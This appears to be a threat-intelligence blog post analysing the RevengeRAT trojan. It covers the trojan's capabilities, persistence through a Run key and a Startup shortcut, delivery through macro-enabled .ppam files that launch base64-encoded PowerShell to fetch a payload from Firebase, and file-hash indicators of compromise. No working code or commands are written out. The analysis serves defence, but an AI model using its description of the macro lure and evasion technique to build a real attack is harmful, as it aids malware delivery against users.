Deep Diving into RevengeRAT
Revenge RAT is a Trojan designed for Windows systems. It responds to commands from a remote control server, enabling actions such as gathering system details, executing or updating files from a provided link or disk, loading plugins, and performing various malicious activities. Furthermore, it establishes persistence on the infected system by creating a Run key Registry entry and a shortcut within the user’s Startup folder.
Target — Windows Platform.
Infection Vector — Malspam campaign of phishing emails.
Functionalities typically includes:
- Unauthorized Remote Access: RevengeRAT grants attackers remote control over compromised systems, enabling them to execute commands and alter settings without user authorization.
- Information Theft: The malware pilfers sensitive data like credentials, keystrokes, and personal details, facilitating malicious activities such as identity theft and financial fraud.
- Surveillance Capabilities: RevengeRAT surveils user actions by capturing screenshots, recording audio/video, and logging keystrokes, furnishing attackers with insights into victim behaviour.
- Persistence Mechanisms: The malware employs methods to sustain prolonged access to infected systems, ensuring continued operation and evasion of detection even after system restarts.
- Propagation and Potential Destructive Actions: Certain iterations of RevengeRAT may propagate to other networked systems and carry out destructive maneuvers such as file deletion or system manipulation, presenting a substantial threat to individuals and organizations alike.
Technical Analysis of RevengeRAT:
Currently, malware creators are utilizing evasion strategies within PPAM files, embedding obfuscated content to heighten the complexity of analyzing the sample.
PPAM (PowerPoint Add-in Macro-Enabled Presentation) files, while less recognized, are increasingly utilized in malware campaigns due to their appealing features such as macro-enabled functionality and obfuscation techniques.
Typically, when opening .ppam files, a dialog message box prompts users to enable macros to access the file’s content. However, this action restricts navigation to other pages. Malware authors exploit this feature to their advantage by embedding malicious macros.
.ppam > Before Enabled Macros
.ppam > After Enabled Macros
In this scenario, the dialog box, representing obfuscated content, includes a version indicator. Despite multiple attempts to enable it, the version continues to increase, preventing closure.
Pop-Error which triggers the macro functions
Upon opening the dialog box, the macro functions are activated, executing PowerShell commands in the background. These commands, encoded in base64, retrieve the payload file from the Firebase storage center and proceed to carry out malicious actions.
Hard-coded powershell Commands:
Indicator of Compromises:
Indicators of Compromise (IoCs) are signs or clues that suggest a computer system has been breached or compromised, helping cybersecurity experts detect and respond to security incidents. They include abnormal activities, patterns, or artifacts that may indicate unauthorized access or malicious actions.
Sandbox Results
HTTP Response of the URL:
Host Identifiers:
- Sha256: dbcb21d5f9c1a74aaeacb6fd5e4bda89af7cf80461eae3fa3c61a8bb90bf5044 | File Type — .ppam
- Sha256: 0d4bad932d1b05dcc6d01613ca6e90a401026ddb274c5ad553e071a0df22767a | File Type — .xls
Reference:
https://www.virustotal.com/gui/file/dbcb21d5f9c1a74aaeacb6fd5e4bda89af7cf80461eae3fa3c61a8bb90bf5044
https://www.virustotal.com/gui/file/0d4bad932d1b05dcc6d01613ca6e90a401026ddb274c5ad553e071a0df22767a
Happy Learning!!!
Author : Priyadharshini K B (Priyadharshini is a SOC Lead and Threat Researcher at ASM Cybersecurity)
#Cybersecurity #RevengeRAT #Malware #Trojan #ThreatAnalysis #InfoSec #DigitalSecurity #CyberThreats #CyberDefense #CyberAttack #MalwareAnalysis #CyberThreatIntelligence #SecurityResearch #DataSecurity #CyberAwareness #NetworkSecurity #EndpointSecurity #CyberCrime #InfoSecurity #CyberSafety #ITSecurity #CyberThreatsAnalysis
